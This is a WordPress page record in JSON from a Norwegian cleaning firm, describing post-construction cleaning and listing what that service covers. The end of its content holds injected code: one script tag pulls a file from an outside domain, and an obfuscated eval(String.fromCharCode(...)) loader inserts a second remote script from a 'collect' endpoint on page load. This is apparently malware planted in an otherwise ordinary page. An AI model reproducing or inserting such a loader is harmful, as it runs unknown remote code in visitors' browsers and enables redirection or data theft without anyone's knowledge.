{"id":5093,"date":"2021-02-25T00:30:46","date_gmt":"2021-02-25T00:30:46","guid":{"rendered":"http:\/\/ms24.no\/?page_id=5093"},"modified":"2021-03-27T04:26:23","modified_gmt":"2021-03-27T03:26:23","slug":"byggvask","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=5093","title":{"rendered":"Bygg vask"},"content":{"rendered":"<h2>Bygg vask<\/h2>\n<p>Ved oppf\u00f8ring av en ny bygg kan mye gj\u00f8res for \u00e5 forhindre et d\u00e5rlig arbeidsmilj\u00f8 og s\u00f8rge for effektiv bygging. Mange vil derfor dra nytte av profesjonelle rengj\u00f8ringsbyr\u00e5er som samtidig vet hvordan en byggeplass fungerer. Rot og st\u00f8v fjernes til fordel for en mer effektiv fremgang. I tillegg s\u00f8rger et effektivt byggrenhold for at ulykker reduseres og at arbeiderne rett og slett kan jobbe under gode vilk\u00e5r. Med andre ord b\u00f8r byggrenhold st\u00e5 sentralt n\u00e5r nye bygg skal reises.<\/p>\n<p>Har man gjort det man skal underveis vil naturligvis den siste \u00abfinishen\u00bb v\u00e6re b\u00e5de enklere og billigere, men ogs\u00e5 her er det viktig at man gj\u00f8r en omfattende jobb for \u00e5 unng\u00e5 at betongrester, gips, byggest\u00f8v og lignende blir spredt utover bygningen. Er det snakk om et offentlig bygg eller en skole s\u00e5 kan dette f\u00e5 store konsekvenser for arbeidsinnsats og arbeidsmilj\u00f8. T\u00f8rr luft er en vanlig konsekvens av d\u00e5rlig byggrenhold. Selv om man tror at det bare er \u00e5 vaske overflatene, s\u00e5 vil gjennomtrekk f\u00f8re til at st\u00f8v kommer tilbake. Med andre er l\u00f8nnsomt \u00e5 f\u00e5 profesjonell hjelp b\u00e5de til byggrenhold og oppf\u00f8lging av det. P\u00e5 denne m\u00e5ten kan man \u00f8ke arbeidsinnsats og redusere egne utgifter..<\/p>\n<h2>Bygg vask omfatter vanligvis<\/h2>\n<ul>\n<li>St\u00f8vsuging og eventuell rens av gulvtepper<\/li>\n<li>\u00a0Renhold av alle indre og ytre gulv og veggfliser<\/li>\n<li>Renhold av alle d\u00f8rer, karmer, lysbrytere og stikkontakter, speil og\u00a0r\u00f8r<\/li>\n<li>\u00a0Renhold av kj\u00f8kken, baderom, toalettsoner, sanit\u00e6re rom, server\/data\u00a0rom<\/li>\n<li>Renhold av alle lufteventiler og kanaler f\u00f8r takplater monteres<\/li>\n<li>Renhold av skap og lignende inventar<\/li>\n<li>Renhold av heiser<\/li>\n<\/ul>\n<ul>\n<li>Renhold av trapper og eventuelle rulletrapper<\/li>\n<li>\u00a0Puss av glass (inne og ute)<\/li>\n<li>\u00a0Renhold og fjerning av flekker og st\u00f8v fra tak, vegger, d\u00f8rer, lister og\u00a0gulv<\/li>\n<li>Flekkfjerning og polering av rustfritt st\u00e5l<\/li>\n<li>Bygg renhold er renhold av alle flater som det er mulig \u00e5 vaske.<\/li>\n<\/ul>\n<p><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bygg vask Ved oppf\u00f8ring av en ny bygg kan mye gj\u00f8res for \u00e5 forhindre et d\u00e5rlig arbeidsmilj\u00f8 og s\u00f8rge for effektiv bygging. Mange vil derfor dra nytte av profesjonelle rengj\u00f8ringsbyr\u00e5er som samtidig vet hvordan en byggeplass fungerer. Rot og st\u00f8v fjernes til fordel for en mer effektiv fremgang. I tillegg s\u00f8rger et effektivt byggrenhold for [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-5093","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5093","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5093"}],"version-history":[{"count":8,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5093\/revisions"}],"predecessor-version":[{"id":5541,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/5093\/revisions\/5541"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5093"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}